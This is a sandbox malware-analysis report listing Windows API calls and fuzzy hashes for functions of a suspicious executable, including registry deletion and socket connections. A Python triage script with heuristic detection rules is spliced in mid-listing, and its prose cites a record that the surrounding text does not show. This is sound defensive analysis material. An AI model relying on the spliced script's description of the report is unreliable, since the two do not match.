                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile$SectionWrite$String
                                                      • String ID:
                                                      • API String ID: 2832842796-0
                                                      • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                      • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                      • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                      • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                      • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Enum$CloseDeleteOpen
                                                      • String ID:
                                                      • API String ID: 2095303065-0
                                                      • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                      • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                      • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                      • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
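The records above (one "APIs" list plus its "Instruction Fuzzy Hash" per function) are easier to review in bulk than by scrolling. The following Python script is an added triage aid, not Joe Sandbox code and not part of this report: it parses records in the format shown on this page, separates a function's own calls from the indented "Part of subcall function" lines, decodes the constant first argument of OpenProcess as a dwDesiredAccess mask (00000410 in the record above resolves to PROCESS_VM_READ | PROCESS_QUERY_INFORMATION), and flags a few API combinations worth a closer look. SAMPLE_REPORT is constructed to mirror records on this page; the RULES and the "target may be itself" hint (drawn from GetCurrentProcessId appearing in the same function) are my own heuristics and produce leads for manual confirmation in the disassembly, not verdicts.

```python
"""Triage the per-function "APIs" records of a Joe Sandbox report.
Added example, not Joe Sandbox code. SAMPLE_REPORT is constructed to mirror
the record format on this page; RULES are my own review heuristics."""
import re
from dataclasses import dataclass, field

SAMPLE_REPORT = """\
APIs
• GetCurrentProcessId.KERNEL32(?), ref: 0047584D
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
• Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
APIs
• LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
• GetProcAddress.KERNEL32(?,?), ref: 004648F7
• GetProcAddress.KERNEL32(?,00000000), ref: 00464916
• Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
• Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
• Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
"""

# One "• Api.MODULE(args), ref: addr" line; subcall lines also carry the callee address.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)")
HASH_RE = re.compile(r"^\s*•\s*Instruction Fuzzy Hash:\s*(?P<hash>[0-9A-F]+)")

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)  # (api, module, args, ref, subcall_addr)
    fuzzy_hash: str = ""                       # the line that closes a record in the report

    def direct_apis(self):
        """APIs the function calls itself, excluding 'Part of subcall' lines."""
        return {api for api, _m, _a, _r, sub in self.calls if sub is None}

    def args_of(self, api):
        return [a for name, _m, a, _r, sub in self.calls if name == api and sub is None]

def parse_records(text):
    records, cur = [], FunctionRecord()
    for line in text.splitlines():
        if m := CALL_RE.match(line):
            cur.calls.append((m["api"], m["mod"], m["args"] or "", m["ref"], m["sub"]))
        elif m := HASH_RE.match(line):
            cur.fuzzy_hash = m["hash"]
            records.append(cur)
            cur = FunctionRecord()
    return records

# Win32 process access rights (winnt.h), used to read OpenProcess's first argument.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION", 0x100000: "SYNCHRONIZE",
}

def decode_access(mask_hex):
    """Expand a dwDesiredAccess value such as 00000410 into named rights."""
    mask = int(mask_hex, 16)
    names = [n for bit, n in sorted(PROCESS_ACCESS.items()) if mask & bit]
    if rest := mask & ~sum(PROCESS_ACCESS):
        names.append(f"0x{rest:X}")            # bits not in the table above
    return names

# Heuristics (my own): every listed API must be a direct call in the same function.
RULES = [
    ("dynamic API resolution", {"LoadLibraryW", "GetProcAddress"}),
    ("enumerate-and-delete registry keys", {"RegEnumKeyExW", "RegDeleteKeyW"}),
    ("remote registry connection", {"RegConnectRegistryW"}),
    ("input state polling", {"GetCursorPos", "GetAsyncKeyState"}),
]

def triage(records):
    findings = []
    for idx, rec in enumerate(records):
        apis = rec.direct_apis()
        for label, needed in RULES:
            if needed <= apis:
                if label == "dynamic API resolution":
                    n = sum(1 for c in rec.calls if c[0] == "GetProcAddress" and c[4] is None)
                    label = f"{label} ({n} GetProcAddress sites)"
                findings.append((idx, label))
        for args in rec.args_of("OpenProcess"):
            mask = args.split(",")[0]             # dwDesiredAccess is the first argument
            if re.fullmatch(r"[0-9A-F]{8}", mask):  # "?" means the report could not resolve it
                who = ("target may be itself" if "GetCurrentProcessId" in apis
                       else "target PID not resolved in report")
                findings.append((idx, f"OpenProcess({'|'.join(decode_access(mask))}); {who}"))
    return findings
```

Run `triage(parse_records(open("report.txt").read()))` on the saved text of the function listing; only constant arguments are decoded, since "?" in the report marks a value the static pass could not resolve. The Instruction Fuzzy Hash kept on each record is the handle for comparing a flagged function against other reports of the same family.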
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00436A24
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: RectWindow
                                                      • String ID:
                                                      • API String ID: 861336768-0
                                                      • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                      • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                      • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                      • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                      APIs
                                                      • SendMessageW.USER32 ref: 00449598
                                                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                      • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                      • _wcslen.LIBCMT ref: 0044960D
                                                      • _wcslen.LIBCMT ref: 0044961A
                                                      • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_wcslen$_wcspbrk
                                                      • String ID:
                                                      • API String ID: 1856069659-0
                                                      • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                      • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                      • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                      • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 004478E2
                                                      • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                      • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                      • GetCursorPos.USER32(00000000), ref: 0044796A
                                                      • TrackPopupMenuEx.USER32(00A66340,00000000,00000000,?,?,00000000), ref: 00447991
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CursorMenuPopupTrack$Proc
                                                      • String ID:
                                                      • API String ID: 1300944170-0
                                                      • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                      • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                      • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                      • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                      APIs
                                                      • GetClientRect.USER32(?,?), ref: 004479CC
                                                      • GetCursorPos.USER32(?), ref: 004479D7
                                                      • ScreenToClient.USER32(?,?), ref: 004479F3
                                                      • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                      • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Client$CursorFromPointProcRectScreenWindow
                                                      • String ID:
                                                      • API String ID: 1822080540-0
                                                      • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                      • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                      • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                      • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                      • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                      • EndPaint.USER32(?,?), ref: 00447D13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                      • String ID:
                                                      • API String ID: 659298297-0
                                                      • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                      • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                      • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                      • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                      APIs
                                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                        • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                        • Part of subcall function 00440D98: SendMessageW.USER32(00A61BD8,000000F1,00000000,00000000), ref: 00440E6E
                                                        • Part of subcall function 00440D98: SendMessageW.USER32(00A61BD8,000000F1,00000001,00000000), ref: 00440E9A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$EnableMessageSend$LongShow
                                                      • String ID:
                                                      • API String ID: 142311417-0
                                                      • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                      • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                      • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                      • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                      • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                      • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                      • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00445879
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                      • _wcslen.LIBCMT ref: 004458FB
                                                      • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                      • String ID:
                                                      • API String ID: 3087257052-0
                                                      • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                      • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                      • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                      • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                      APIs
                                                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                      • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 245547762-0
                                                      • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                      • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                      • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                      • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 004471D8
                                                      • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                      • SelectObject.GDI32(?,00000000), ref: 00447228
                                                      • BeginPath.GDI32(?), ref: 0044723D
                                                      • SelectObject.GDI32(?,00000000), ref: 00447266
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Object$Select$BeginCreateDeletePath
                                                      • String ID:
                                                      • API String ID: 2338827641-0
                                                      • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                      • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                      • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                      • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 00434598
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                      • Sleep.KERNEL32(00000000), ref: 004345D4
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CounterPerformanceQuerySleep
                                                      • String ID:
                                                      • API String ID: 2875609808-0
                                                      • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                      • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                      • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                      • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00460C17
